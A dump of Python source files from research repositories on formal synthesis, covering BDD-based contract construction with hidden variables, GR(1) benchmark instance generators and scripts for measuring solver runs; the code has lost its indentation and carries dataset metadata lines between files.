# Project(x, y, m, i, Target) ==
# /\ \E h:
# LET
# r == Mask(m, h, x)
# IN
# /\ Inv(r, y, m, i)
# /\ Target(r, y, m, i)
# <=>
# \E h, r:
# /\ Selector(h, r)
# /\ Inv(r, y, m, i)
# /\ Target(r, y, m, i)
#
# Note that:
#
# Project(Target) <=> /\ ~ Observable(~ Target)
# /\ \E h: LET r == Mask(m, h, x)
# IN Inv(r, y, m, i)
# s = r'''
# \E {h}, {r}: (
# /\ {selector}
# /\ @{target}
# /\ @{inv} )
# '''.format(
# h=h, r=r,
# selector=aut.selector,
# inv=within_r,
# target=target_r)
# u = aut.add_expr(s)
u = aut.selector & target_r & within_r
assert scope.is_state_predicate(u)
return aut.exist(aut.hr, u)
def main(aut):
"""Decompose specification into a contract."""
inv = _closure.closure(aut.players, aut)
assert not (aut.support(inv) & aut.masks)
assert_type_invariant_implies_type_hints(inv, aut)
fname = 'inv_bdd.pdf'
dump_bdd_using_autoref(inv, fname)
_closure.print_state_space_statistics(inv, aut)
s = dumps_expr(inv, aut, use_types=True)
print('\nshared invariant Inv:\n')
print(s)
# fname = 'Invariant.tla'
# utils.dump_as_tla(s, fname)
#
# for charging station example
# sys_player = 'station'
# vrs = ['pos_x', 'pos_y'] # hide these variables
#
# for landing gear example
sys_player = 'autopilot'
vrs = ['door']
_closure.hide_vars_from_sys(vrs, inv, sys_player, aut)
#
# for charging station example
# sys_player = 'robot'
# players = ['robot', 'station']
#
# for autopilot example
sys_player = 'autopilot'
players = ['autopilot', 'gear_module', 'door_module']
#
aut.global_inv = inv # global full-info invariant
aut_unzipped = _closure.unzip(inv, aut.players, aut)
# configure mask parameters
initial_phase = 0
phase = '{i}_0'.format(i=initial_phase)
_masks.add_masks_and_hidden_vars(aut_unzipped, phase=phase)
aut_unzipped.observe(sys_player, [sys_player])
# require initial condition
param_inv = parametric_predicate(inv, aut_unzipped)
param_z = outer_fixpoint(players, aut_unzipped)
z = param_z[initial_phase]
u = z | ~ param_inv
qvars = aut.vars_of_all_players
u = aut_unzipped.forall(qvars, u)
# BDD stats
stats = aut.bdd.statistics()
s = utils.format_stats(stats)
print(s)
def dump_bdd_using_autoref(u, fname):
# copy from `dd.cudd` to `dd.autoref`
b = autoref.BDD()
cudd_bdd = u.bdd
_bdd.copy_vars(cudd_bdd, b)
r = _bdd.copy_bdd(u, cudd_bdd, b)
autoref.reorder(b)
b.dump(fname, [r])
print('dumped BDD to file "{f}"'.format(f=fname))
def maximum_sum(u, aut):
"""Return assignment that maximizes sum of `u` support vars.
`u` should depend only on integer-valued variables.
For example, if `u` depends on the variables `a, b, c`
and `values == dict(a=1, b=2, c=-1)` is returned, then the
following properties hold:
/\ LET a == 1
b == 2
c == -1
IN u
/\ \A i, j, k:
(LET a == i
b == j
c == k
IN u)
=> (a + b + c >= i + j + k)
"""
vrs = aut.support(u)
assert vrs.issubset(aut.masks), vrs
vrs_sum = ' + '.join(vrs)
# bisection
a = 0
b = len(vrs)
assert a < b, (a, b)
s = '@{u} /\ ({vrs_sum} >= {{bound}})'.format(
u=u, vrs_sum=vrs_sum)
fa = _eval(s, a, aut)
fb = _eval(s, b, aut)
assert fa, 'not feasible'
while a != b:
c = math.ceil((a + b) / 2)
fc = _eval(s, c, aut)
if fc:
a = c
else:
b = c - 1
print('bisection: {ab}'.format(ab=(a, b)))
assert a == b, (a, b)
bound = a
print('Maximum: {bound}'.format(bound=bound))
# return a maximal satisfying assignment
s = s.format(bound=bound)
u = aut.add_expr(s)
values = {var: 1 for var in aut.masks}
values.update(aut.pick(u))
return values
def _eval(s, bound, aut):
"""Return """
s = s.format(bound=bound)
u = aut.add_expr(s)
return u != aut.false
def assert_type_invariant_implies_type_hints(inv, aut):
"""Raise `AssertionError` if `~ |= inv => type_hints`."""
vrs = aut.vars_of_all_players
assert aut.implies_type_hints(inv, vrs)
def outer_fixpoint(players, aut):
player = players[0]
n_goals = len(aut.win[player]['[]<>'])
z = [aut.true] * n_goals
zold = [None] * n_goals
# effectively the greatest fixpoint Z
while z != zold:
zold = z
z = iterate_recurrence_goals(z, players, aut)
assert all(u <= v for u, v in zip(z, zold))
return z
def iterate_recurrence_goals(z, players, aut):
within = aut.global_inv
player = players[0]
k_players = len(players) - 1
n_goals = len(aut.win[player]['[]<>'])
for i in range(n_goals):
for j in range(k_players):
phase = '{i}_{j}'.format(i=i, j=j)
_masks.add_masks_and_hidden_vars(aut, phase=phase)
z_new = list(z)
for i, goal in enumerate(aut.win[player]['[]<>']):
print('recurrence goal: {i}'.format(i=i))
# declare at top to propagate to copied automata
# caution: overwrites parameter maps
ij = (i, 0)
i_next = (i + 1) % n_goals
z_next = z[i_next]
y = single_recurrence_goal(goal, z_next, within, players, ij, aut)
z_new[i] &= y
return z_new
def single_recurrence_goal(target, z_next, within, players, ij, aut):
"""Development harness for parameterized assumption construction."""
assert 'scheduler' not in players
print('single recurrence goal: {ij}'.format(ij=ij))
i, j = ij
assert i >= 0, i
assert j >= 0, j
phase = '{i}_{j}'.format(i=i, j=j)
_masks.add_masks_and_hidden_vars(aut, phase=phase)
# define players that assumptions will be generated for
# players outside `team` are treated as the team's environment
player, *team = players
print('player: {p}'.format(p=player))
print('team: {t}'.format(t=team))
# define what the component observes
aut.observe(player, [player])
# eliminate hidden vars from target
inv = aut.global_inv
vis_z = observable(z_next, inv, inv, aut)
vis_target = observable(target, inv, inv, aut)
y = vis_target
# print('vis_target')
# print_slice(vis_target, aut)
yold = None
# iterate over assumption generation,
# which is effectively the least fixpoint Y
trap = aut.true
etas = list()
while y != yold:
# print('Y iteration')
yold = y
# can others help as a team ?
attr, trap, eta_team = make_pinfo_assumption(
y, vis_z, within, player, team, aut)
etas.append(eta_team)
within_new = inv & trap
z_next_new = aut.true
ij_new = (i, j + 1)
# decompose team
if len(team) > 1:
single_recurrence_goal(
~ eta_team, z_next_new, within_new,
team, ij_new, aut)
y = attr | trap
# print('Y')
# print_slice(y, aut)
# \A vars: (Inv /\ ~ Target) => Y
aut.observe(player, [player])
proj_inv = maybe(inv, inv, aut)
u = y | ~ proj_inv
qvars = aut.vars_of_all_players
u = aut.forall(qvars, u)
print('Maybe(Inv) => Y')
print_slice(u, aut)
u = y | target | ~ inv
u = aut.forall(qvars, u)
print('Inv => (Y \/ Target)')
print_slice(u, aut)
print('end: {ij}========\n'.format(ij=ij))
return y
def make_pinfo_assumption(
goal, z, within, player, team, aut):
assert goal != aut.false
assert player not in team, (player, team)
inv = aut.global_inv
# player automaton
aut.team = [player]
aut.observe(player, [player])
cpre.group_as_env_sys(aut.team, aut)
cpre.parametrize_actions(aut)
# team automaton
team_aut = copy.copy(aut)
team_aut.team = list(team)
crow = team[0]
team_aut.observe(crow, team)
cpre.group_as_env_sys(team, team_aut)
cpre.parametrize_actions(team_aut)
# player attractor
goal &= cpre.step(z, aut)
attr = cpre.attractor(goal, aut)
# team attractor initializes `basin`
goal_team = observable(attr, inv, inv, team_aut)
basin = cpre.attractor(goal_team, team_aut)
# chase escapes
escape = aut.true
converged = aut.false
while escape != aut.false:
print('escapes iteration')
# enlarge, following escapes
proj_inv = maybe(inv, inv, team_aut)
out = ~ basin & proj_inv
# check equivalent expression
# this equivalence holds because `basin` has as support
# only variables visible to the team
out_2 = ~ basin & inv
out_2 = maybe(out_2, inv, team_aut)
assert out_2 == out
#
holes = basin & cpre.step(out, team_aut)
escape = out & fx.image(holes & inv, team_aut) # assembly step
escape = out & maybe(escape, inv, team_aut)
escape &= ~ converged # keep converged ones unchanged
old_basin = basin
basin |= escape
# recompute
eta_player, eta_team = persistence_guarantee(
attr, basin, within, aut, team_aut)
non_empty = non_empty_slices(eta_player, aut)
converged |= non_empty
# assert
non_full = non_empty_slices(~ eta_player, aut)
assert non_empty != aut.true, 'disconnected comm too ??'
assert non_full == aut.true
assert scope.support_issubset(converged, aut.masks, aut)
assert converged == aut.false or eta_player != aut.false
assert converged != aut.true, 'all architectures converged'
assert goal <= attr
assert eta_player & goal == aut.false
assert eta_player & attr == aut.false
print('trap')
print_slice(eta_player, aut)
print('eta_team')
print_slice(eta_team, team_aut)
return attr, eta_player, eta_team
def persistence_guarantee(
attr, basin, within, aut, team_aut):
"""Create an assumption in presence of hiding."""
assert attr != aut.false
inv = team_aut.global_inv
# attractor by team
u = ~ basin & maybe(inv, inv, team_aut)
goal_team = (
observable(attr, inv, inv, team_aut)
| u)
b_team = basin & cpre.attractor(goal_team, team_aut)
eta_team = b_team & ~ goal_team
# trap by player
assert eta_team <= basin # => obs_basin unnecessary
stay = observable(eta_team, inv, inv, aut)
unless = attr
trap = cpre.trap(stay, unless, aut)
eta_player = trap & ~ unless
return eta_player, eta_team
def exist_env_vars(u, aut):
"""Projection `\E env_vars: u`."""
qvars = aut.varlist['env']
r = aut.exist(qvars, u)
return r
def print_slice(u, aut, conj_types=False):
v = _slice(u, aut)
if v == aut.false:
print('FALSE')
return
if v == aut.true:
print('TRUE')
return
if conj_types:
v &= sym.type_hints_for_support(v, aut)
care = aut.true
s = sym.dumps_expr(v, aut, care=care, use_types=True)
print(s + '\n')
def _slice(u, aut):
return _slice_landing_gear_example(u, aut)
def _slice_charging_station_example(u, aut):
"""Replace masks with values."""
comm = dict(
station=dict(
req=1,
pos_x=0,
pos_y=0,
occ=1,
_i=1),
robot=dict(
spot_1=0,
spot_2=0,
free_x=1,
free_y=0,
free=1,
occ=0,
_i=1))
phase = '0_0'
values = connectivity_to_masks(comm, phase)
v = aut.let(values, u)
comm = dict(
station=dict(
req=1,
pos_x=0,
pos_y=0,
occ=1,
_i=1),
robot=dict(
spot_1=0,
spot_2=0,
free_x=1,
free_y=1,
free=1,
occ=0,
_i=1))
phase = '1_0'
values = connectivity_to_masks(comm, phase)
v = aut.let(values, v)
return v
def _slice_landing_gear_example(u, aut):
"""Replace masks with values."""
# takeoff to cruise, this one only for top level
# cruise: mode = 1
comm_to_cruise_1 = dict(
autopilot=dict(
gear=0,
door=1,
_i=1),
gear_module=dict(
mode=1,
height=1,
speed=0,
_i=1))
# landing: mode = 0
comm_to_landing_1 = dict(
autopilot=dict(
gear=1,
door=0,
_i=1),
gear_module=dict(
mode=1,
height=0,
speed=1,
_i=1))
phase = '0_0'
values_1 = connectivity_to_masks(comm_to_landing_1, phase)
phase = '1_0'
values_2 = connectivity_to_masks(comm_to_cruise_1, phase)
# lower level
# cruise: mode = 1
comm_to_cruise_2 = dict(
autopilot=dict(
gear=0,
door=1,
_i=1),
door_module=dict(
mode=0,
height=0,
speed=0,
gear=1,
_i=1),
gear_module=dict(
mode=1,
height=1,
speed=0,
door=1,
_i=1))
# landing: mode = 0
comm_to_landing_2 = dict(
autopilot=dict(
gear=1,
door=0,
_i=1),
door_module=dict(
mode=1,
height=0,
speed=1,
gear=0,
_i=1),
gear_module=dict(
mode=1,
height=0,
speed=1,
door=1,
_i=1))
phase = '0_1'
values_3 = connectivity_to_masks(comm_to_landing_2, phase)
phase = '1_1'
values_4 = connectivity_to_masks(comm_to_cruise_2, phase)
values = values_1
values.update(values_2)
values.update(values_3)
values.update(values_4)
v = aut.let(values, u)
return v
def non_empty_slices(u, aut):
"""Return parameters that yield non-empty `u` slice."""
qvars = aut.vars_of_all_players
return aut.exist(qvars, u)
def communication_schedule(aut):
"""Return assignment to indexed mask vars, as `dict`."""
phases = aut.phases
values = dict()
for phase, j in phases.items():
comm = aut.comm_arch(phase)
for player, vrs in comm.items():
for var, visible in vrs.items():
s = '{player}_mask_{var}_{j}'.format(
player=player, var=var, j=j)
values[s] = 1 - visible
return values
def connectivity_to_masks(comm, j):
values = dict()
for player, vrs in comm.items():
for var, visible in vrs.items():
s = '{player}_mask_{var}_{j}'.format(
player=player, var=var, j=j)
values[s] = 1 - visible
return values
class Automaton(sym.Automaton):
"""Subclass to copy attributes relevant to hiding."""
def __init__(self):
super().__init__()
self.global_inv = None # full info invariant
self.inv = None # InvH
self.team = list() # \subseteq self.players
self.visible = list()
self.observer = None
self.masks = set()
self.masks_of = dict()
self.xy_to_h = dict()
self.xy_to_r = dict()
self.x_to_r = dict()
self.h = set()
self.r = set()
self.hr = set()
self.mask_to_subproblem = dict()
self.type_invariant = None
self.bdd.configure(
max_memory=2 * cudd.GB,
max_cache_hard=2**25)
def __copy__(self):
new = super().__copy__()
new.global_inv = self.global_inv
new.inv = self.inv
new.team = list(self.team)
new.visible = self.visible
new.observer = self.observer
new.masks = self.masks
new.masks_of = self.masks_of
new.xy_to_h = dict(self.xy_to_h)
new.xy_to_r = dict(self.xy_to_r)
new.x_to_r = dict(self.x_to_r)
new.h = set(self.h)
new.r = set(self.r)
new.hr = set(self.hr)
# global indexing of masks
new.mask_to_subproblem = self.mask_to_subproblem
new.type_invariant = self.type_invariant
return new
def observe(self, player, visible):
"""Set observer and """
self.observer = player
self.visible = visible
x = utils.collect_env_vars(
visible, self.players, self)
selector = _masks.masking_predicates(
self.observer, x, self)
self.selector = self.add_expr(selector)
x = utils.collect_env_vars(
visible, self.players, self)
self.x_to_r = {
k: v for k, v in self.xy_to_r.items()
if k in x}
self.h = {self.xy_to_h[var] for var in x}
self.r = {self.xy_to_r[var] for var in x}
self.hr = self.h | self.r
```
#### File: johnyf/contract_maker/cpre_noninterleaving.py
```python
from omega.symbolic import bdd as scope
import symbolic as sym
import utils
def group_as_env_sys(team, aut):
"""Assign "env" and "sys" in `aut.action`."""
others = set(aut.players).difference(team)
sys_next = sym.conj_actions_of(team, aut)
env_next = sym.conj_actions_of(others, aut)
aut.action['sys'] = sys_next
aut.action['env'] = env_next
sys_vars = aut.vars_of_players(team)
env_vars = aut.vars_of_players(others)
aut.varlist['sys'] = sys_vars
aut.varlist['env'] = env_vars
aut.varlist['sys_p'] = aut.prime_vars(sys_vars)
aut.varlist['env_p'] = aut.prime_vars(env_vars)
def parametrize_actions(aut):
"""Return parametrized actions."""
sys_next = aut.action['sys']
env_next = aut.action['env']
x = utils.collect_env_vars(aut.visible, aut.players, aut)
h = {aut.xy_to_h[var] for var in x}
r = {aut.xy_to_r[var] for var in x}
x_to_r = {k: v for k, v in aut.xy_to_r.items()
if k in x}
inv = aut.global_inv
# substitutions
inv_r = aut.let(x_to_r, inv)
sys_next_r = aut.let(x_to_r, sys_next)
env_next_r = aut.let(x_to_r, env_next)
#
# Selector(h, r) == r = Mask(m, v, h)
#
# MaskedInv(h) ==
# LET r == Mask(m, v, h)
# IN Inv(r, y)
# <=>
# \E r: /\ Selector(h, r)
# /\ Inv(r, y)
u = inv_r & aut.selector
masked_inv = aut.exist(r, u)
#
# ParamInv == \E h: MaskedInv(h)
param_inv = aut.exist(h, masked_inv)
#
# ParamSysNext ==
# /\ ParamInv
# /\ \A h: LET r == Mask(m, v, h)
# IN Inv(r, y) => SysNext(r, y, y')
# <=>
# /\ ParamInv
# /\ \A h: \E r:
# /\ Selector(h, r)
# /\ Inv(r, y) => SysNext(r, y, y')
u = sys_next_r | ~ inv_r
u &= aut.selector
u = aut.exist(r, u)
u = aut.forall(h, u)
param_sys_next = u & param_inv
#
# ParamEnvNext ==
# \E h: /\ MaskedInv(h)
# /\ MaskedEnvNext(h, v', x')
# <=>
# \E h: LET r == Mask(m, v, h)
# IN
# /\ Inv(r, y)
# /\ EnvNext(r, y, x')
# <=>
# \E h: \E r:
# /\ Selector(h, r)
# /\ Inv(r, y)
# /\ EnvNext(r, y, x')
u = aut.selector & inv_r & env_next_r
param_env_next = aut.exist(h | r, u)
aut.action['sys'] = param_sys_next
aut.action['env'] = param_env_next
def trap(stay, escape, aut):
"""Greatest fixpoint, with lower bound."""
assert scope.is_state_predicate(stay)
assert scope.is_state_predicate(escape)
qold = None
q = aut.true
while q != qold:
qold = q
q &= step(q, aut)
q &= stay
q |= escape
assert q <= qold
assert q <= (stay | escape)
return q
def attractor(target, aut):
"""Least fixpoint."""
assert scope.is_state_predicate(target)
qold = None
q = target
while q != qold:
qold = q
q |= step(q, aut)
assert q >= qold
assert q >= target
return q
def step(target, aut):
"""Return controllable predecessors."""
vrs = aut.vars_of_all_players
u = aut.replace_with_primed(vrs, target)
# /\ SysNext
# /\ EnvNext => Target'
u |= ~ aut.action['env']
u &= aut.action['sys']
# \E sys_vars': \A env_vars'
u = aut.forall(aut.varlist['env_p'], u)
u = aut.exist(aut.varlist['sys_p'], u)
return u
``` |
{
"source": "johnyf/gr1experiments",
"score": 3
} |
#### File: examples/bunny/make_instances.py
```python
import argparse
import pprint
import logging
import re
from tugs import utils
log = logging.getLogger(__name__)
INPUT_FILE = 'bunny.pml'
PROMELA_PATH = 'pml/bunny_{i}.txt'
SLUGSIN_PATH = 'slugsin/bunny_{i}.txt'
N = 2
M = 17
def dump_promela(n, m):
"""Dump instances of Promela."""
for i in xrange(n, m):
code = make_promela(i)
promela_file = PROMELA_PATH.format(i=i)
with open(promela_file, 'w') as f:
f.write(code)
log.info('dumped Promela for {i} masters'.format(i=i))
def dump_slugsin(n, m):
for i in xrange(n, m):
promela_file = PROMELA_PATH.format(i=i)
with open(promela_file, 'r') as f:
pml_code = f.read()
slugsin_code = utils.translate_promela_to_slugsin(pml_code)
slugsin_file = SLUGSIN_PATH.format(i=i)
with open(slugsin_file, 'w') as f:
f.write(slugsin_code)
log.info('dumped SlugsIn for {i} masters'.format(i=i))
def make_promela(n):
"""Return Promela code for instance with size `n`."""
fname = INPUT_FILE
with open(fname, 'r') as f:
s = f.read()
# set number of cells
newline = '#define H {n}'.format(n=n)
code = re.sub('#define H.*', newline, s)
newline = '#define W {m}'.format(m=n-1)
code = re.sub('#define W.*', newline, code)
# add multiple weak fairness assumptions
# code += form_progress(n)
return code
def form_progress(n):
"""Return conjunction of LTL formulae for progress."""
prog = ' && '.join(
'[]<>(request[{k}] -> (master == {k}))'.format(k=k)
for k in xrange(n))
return 'assert ltl { ' + prog + ' }'
def main():
# log
fh = logging.FileHandler('code_generator_log.txt', mode='w')
log.addHandler(fh)
log.setLevel(logging.DEBUG)
# tugs log
log1 = logging.getLogger('tugs.utils')
log1.addHandler(fh)
log1.setLevel(logging.DEBUG)
# record env
versions = utils.snapshot_versions()
log.info(pprint.pformat(versions))
# args
p = argparse.ArgumentParser()
p.add_argument('--min', default=N, type=int,
help='from this # of masters')
p.add_argument('--max', default=M, type=int,
help='to this # of masters')
# p.add_argument('--debug', type=int, default=logging.ERROR,
# help='python logging level')
args = p.parse_args()
n = args.min
m = args.max + 1
dump_promela(n, m)
dump_slugsin(n, m)
if __name__ == '__main__':
main()
```
#### File: examples/cinderella/pml_to_slugsin.py
```python
import argparse
from tugs import utils
def dump_slugsin():
p = argparse.ArgumentParser()
p.add_argument('source', type=str,
help='input file')
p.add_argument('target', type=str,
help='output file')
args = p.parse_args()
with open(args.source, 'r') as f:
pml_code = f.read()
slugsin_code = utils.translate_promela_to_slugsin(pml_code)
with open(args.target, 'w') as f:
f.write(slugsin_code)
if __name__ == '__main__':
dump_slugsin()
```
#### File: gr1experiments/examples/cp_plots.py
```python
import os
import shutil
def main():
path = './synt15/'
fig_fname = 'stats.pdf'
destination = 'all_plots'
for root, dirs, files in os.walk(path):
for f in files:
if f != fig_fname:
continue
_, tail = os.path.split(root)
fname = tail + '.pdf'
a = os.path.join(root, f)
b = os.path.join(path, destination, fname)
print(a, b)
shutil.copy(a, b)
if __name__ == '__main__':
main()
```
#### File: gr1experiments/examples/digest.py
```python
import datetime
import os
import psutil
from tugs import utils
def scan():
paths = [
'./genbuf/runs',
'./genbuf/runs_slugs']
for path in paths:
scan_directory(path)
def scan_directory(path):
logname = 'details_'
incomplete_files = list()
for root, dirs, files in os.walk(path):
for f in files:
if f.startswith(logname):
file_path = os.path.join(root, f)
file_path = os.path.abspath(file_path)
data = utils.load_log_file(file_path)
if 'make_transducer_end' in data:
continue
# still running or killed
incomplete_files.append(file_path)
open_files_by = find_file_pids(incomplete_files)
for f, name, pid in open_files_by:
print(f, name, pid)
print_progress(f)
print('\n')
open_files = [f for f, _, _ in open_files_by]
dead_files = [
f for f in incomplete_files
if f not in open_files]
print('dead files:')
for f in dead_files:
print(f)
def find_file_pids(files):
open_files_by = list()
for p in psutil.process_iter():
try:
flist = p.open_files()
pid = p.pid
name = p.name()
except (psutil.NoSuchProcess, psutil.AccessDenied):
continue
if not flist:
continue
for path, _ in flist:
if path not in files:
continue
open_files_by.append((path, name, pid))
return open_files_by
def print_progress(f):
data = utils.load_log_file(f)
if 'winning_set_start' in data:
print('started win set')
t0 = data['winning_set_start']['time'][0]
date = datetime.datetime.fromtimestamp(t0)
s = date.strftime('%Y-%m-%d %H:%M:%S')
print('win set start at: {s}'.format(s=s))
if 'winning_set_end' in data:
print('finished win set')
t1 = data['winning_set_end']['time'][0]
t_win = t1 - t0
print('win set time: {t:1.2f} sec'.format(t=t_win))
date = datetime.datetime.fromtimestamp(t1)
s = date.strftime('%Y-%m-%d %H:%M:%S')
print('win set end at: {s}'.format(s=s))
if 'make_transducer_start' in data:
print('started making transducer')
if 'make_transducer_end' in data:
print('finished making transducer')
if __name__ == '__main__':
scan()
```
#### File: gr1experiments/examples/interfere.py
```python
import argparse
import datetime
import pprint
import logging
import multiprocessing as mp
import sys
import time
import psutil
from tugs import solver
from tugs import utils
import matplotlib as mpl
mpl.use('Agg')
from matplotlib import pyplot as plt
GB = 2**30
GR1X_LOG = 'tugs.solver'
def run_parallel():
"""Run concurrent instances, increasing their number."""
print('run increasingly larger groups of instances.')
problem = 'synt15'
output = 'runs_testing'
target = run_gr1x
slugsin_file = '{problem}/slugsin/{problem}_20.txt'.format(
problem=problem)
details_file = '{problem}/{output}/details_{s}.txt'.format(
problem=problem, output=output, s='{n}_{cpu}')
strategy_file = '{problem}/{output}/strategy.txt'.format(
problem=problem, output=output)
n_cpus = psutil.cpu_count(logical=False)
print('{n_cpus} physical CPUs'.format(n_cpus=n_cpus))
n_cpus = psutil.cpu_count(logical=True)
print('{n_cpus} logical CPUs'.format(n_cpus=n_cpus))
for n in xrange(1, n_cpus + 1):
print('trying {n} CPUs'.format(n=n))
procs = list()
for cpu in xrange(n):
d = dict(
affinity=[cpu],
slugsin_file=slugsin_file,
details_file=details_file.format(n=n, cpu=cpu),
strategy_file=strategy_file)
p = mp.Process(target=target, kwargs=d)
procs.append(p)
for p in procs:
p.start()
for p in procs:
p.join()
print('all joined')
def run_gr1x(slugsin_file, strategy_file,
details_file, affinity=None, **kw):
"""Run `gr1x` instance with given affinity."""
win_set_file = 'winning_set'
proc = psutil.Process()
proc.cpu_affinity(affinity)
# log verbosity
level = logging.INFO
log = logging.getLogger(GR1X_LOG)
log.setLevel(level)
# dump log
h = logging.FileHandler(details_file, mode='w')
log.addHandler(h)
# capture execution environment
versions = utils.snapshot_versions(check=False)
log.info(pprint.pformat(versions))
# synthesize
with open(slugsin_file, 'r') as f:
s = f.read()
t0 = time.time()
solver.solve_game(
s,
win_set_fname=win_set_file,
strategy_fname=strategy_file,
max_memory=1 * GB)
t1 = time.time()
dt = datetime.timedelta(seconds=t1 - t0)
print('Done with: {fname} in {dt}'.format(
fname=slugsin_file, dt=dt))
# close log file
log.removeHandler(h)
h.close()
sys.stdout.flush()
def plot_saturation():
"""Plot time versus number of processors active."""
print('plot saturating effect')
fig_fname = 'cpu_saturation.pdf'
problem = 'synt15'
output = 'runs_testing'
details_file = '{problem}/{output}/details_{s}.txt'.format(
problem=problem, output=output, s='{n}_{cpu}')
fig = plt.figure()
fig.set_size_inches(5, 10)
total_time = dict()
n_cpus = psutil.cpu_count(logical=True)
cpus = range(1, n_cpus + 1)
for n in cpus:
print('load data of {n} CPUs'.format(n=n))
times = list()
for cpu in xrange(n):
fname = details_file.format(n=n, cpu=cpu)
data = utils.load_log_file(fname)
t0 = data['parse_slugsin']['time'][0]
t1 = data['make_transducer_end']['time'][0]
t = t1 - t0
times.append(t)
total_time[n] = times
plt.plot([n] * len(times), times, 'bo')
plt.xlabel('number of logical cores used')
plt.ylabel('Time (sec)')
plt.grid(True)
plt.savefig(fig_fname, bbox_inches='tight')
if __name__ == '__main__':
p = argparse.ArgumentParser()
p.add_argument('--run', action='store_true',
help='run instances and log measurements')
args = p.parse_args()
if args.run:
run_parallel()
plot_saturation()
```
#### File: examples/jcss12/make_instances.py
```python
import argparse
import pprint
import logging
from tugs import utils
import amba_generator
log = logging.getLogger(__name__)
PROMELA_PATH = 'pml/jcss12_{i}.txt'
SLUGSIN_PATH = 'slugsin/jcss12_{i}.txt'
N = 2
M = 17
def dump_promela(n, m):
"""Dump instances as Promela."""
for i in xrange(n, m):
code = amba_generator.generate_spec(i, use_ba=False)
promela_file = PROMELA_PATH.format(i=i)
with open(promela_file, 'w') as f:
f.write(code)
log.info('dumped Promela for {i} masters'.format(i=i))
def dump_slugsin(n, m):
"""Dump instances as SlugsIn."""
for i in xrange(n, m):
promela_file = PROMELA_PATH.format(i=i)
with open(promela_file, 'r') as f:
pml_code = f.read()
slugsin_code = utils.translate_promela_to_slugsin(pml_code)
slugsin_file = SLUGSIN_PATH.format(i=i)
with open(slugsin_file, 'w') as f:
f.write(slugsin_code)
log.info('dumped SlugsIn for {i} masters'.format(i=i))
def main():
# log
fh = logging.FileHandler('code_generator_log.txt', mode='w')
log.addHandler(fh)
log.setLevel(logging.DEBUG)
# tugs log
log1 = logging.getLogger('tugs.utils')
log1.addHandler(fh)
log1.setLevel(logging.DEBUG)
# record env
versions = utils.snapshot_versions()
log.info(pprint.pformat(versions))
# args
p = argparse.ArgumentParser()
p.add_argument('--min', default=N, type=int,
help='from this # of masters')
p.add_argument('--max', default=M, type=int,
help='to this # of masters')
# p.add_argument('--debug', type=int, default=logging.ERROR,
# help='python logging level')
args = p.parse_args()
n = args.min
m = args.max + 1
dump_promela(n, m)
dump_slugsin(n, m)
if __name__ == '__main__':
main()
``` |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.